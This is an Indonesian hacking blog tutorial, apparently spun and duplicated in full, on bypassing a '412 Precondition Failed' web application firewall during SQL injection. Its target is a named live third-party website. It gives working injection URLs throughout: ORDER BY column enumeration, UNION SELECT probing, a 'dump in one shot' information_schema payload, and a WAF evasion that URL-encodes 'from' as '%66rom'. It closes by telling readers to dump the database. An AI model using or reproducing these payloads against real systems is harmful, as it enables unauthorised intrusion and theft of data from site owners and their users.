Cara Bypass Sqli 412 Precondition Failed
Oke pada kesempatan kali ini gw mau sharing tutorial Cara Bypass Sqli 412 Precondition Failed.
Pernah gasih kalian pada ketika melaksanakan inject suatu website gatau kenapa tiba-tiba kena WAF sama menyerupai halnya yang gw alamin ketika ini yakni kena waf 412 precondition failed.
Pasti pernah kan? Apalagi kalo kalian kena wafnya sama kek gw, cocok banget jadi kini kita bahas aja bagaimana cara mengatasinya, simak dibawah ini.
Disini gw udah sanggup sasaran yang mau di sanksi atau di bypass, dan ini live targetnya,
http://www.cruiseland.in/houseboat-package-detailed.php?id=5
Selanjutnya eksklusif saja kita masukan order+by+1-- dan hingga menemukan errornya.
Disini gw mendapat errornya diangka 11 berarti jumlah columnnya ada 10.
Oke, lanjut ke step berikutnya ya itu mencari angka magicknya dengan memasukan query union+select+1,2,3-- dan seterunya hingga angka 10 menyerupai berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10--
Dan disini gw mendapat angka magicknya 2 dan 5 lebih jelasnya sanggup dlihat gambar bawah ini,
Setelah kita mendapat angka magicknya, kini kita tinggal masukan dios. Disini gw masukin diosnya diangka 5 menyerupai berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Dan ternyata sesudah di inject dengan dios tadi malah kena waf 412 Precondition Failed oke kita bypass.
Cara bypassnya tinggal ubah karakter f pada " from " dengan url encode menyerupai ini contohnya,
f=%66
%66rom
Contoh menyerupai berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Nah tuh lihat gambar diatas, bypass sukses. Kalo udah begini tinggal didump databasenya.
Sekian dari gue, supaya bermanfaat.
Pernah gasih kalian pada ketika melaksanakan inject suatu website gatau kenapa tiba-tiba kena WAF sama menyerupai halnya yang gw alamin ketika ini yakni kena waf 412 precondition failed.
Pasti pernah kan? Apalagi kalo kalian kena wafnya sama kek gw, cocok banget jadi kini kita bahas aja bagaimana cara mengatasinya, simak dibawah ini.
Disini gw udah sanggup sasaran yang mau di sanksi atau di bypass, dan ini live targetnya,
http://www.cruiseland.in/houseboat-package-detailed.php?id=5
Selanjutnya eksklusif saja kita masukan order+by+1-- dan hingga menemukan errornya.
Disini gw mendapat errornya diangka 11 berarti jumlah columnnya ada 10.
Oke, lanjut ke step berikutnya ya itu mencari angka magicknya dengan memasukan query union+select+1,2,3-- dan seterunya hingga angka 10 menyerupai berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10--
Dan disini gw mendapat angka magicknya 2 dan 5 lebih jelasnya sanggup dlihat gambar bawah ini,
Setelah kita mendapat angka magicknya, kini kita tinggal masukan dios. Disini gw masukin diosnya diangka 5 menyerupai berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Dan ternyata sesudah di inject dengan dios tadi malah kena waf 412 Precondition Failed oke kita bypass.
Cara bypassnya tinggal ubah karakter f pada " from " dengan url encode menyerupai ini contohnya,
f=%66
%66rom
Contoh menyerupai berikut ini,
http://www.cruiseland.in/houseboat-package-detailed.php?id=-5+union+select+1,2,3,4,make_set(6,@:=0x0a,(select(1)%66rom(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6,7,8,9,10--
Nah tuh lihat gambar diatas, bypass sukses. Kalo udah begini tinggal didump databasenya.
Sekian dari gue, supaya bermanfaat.
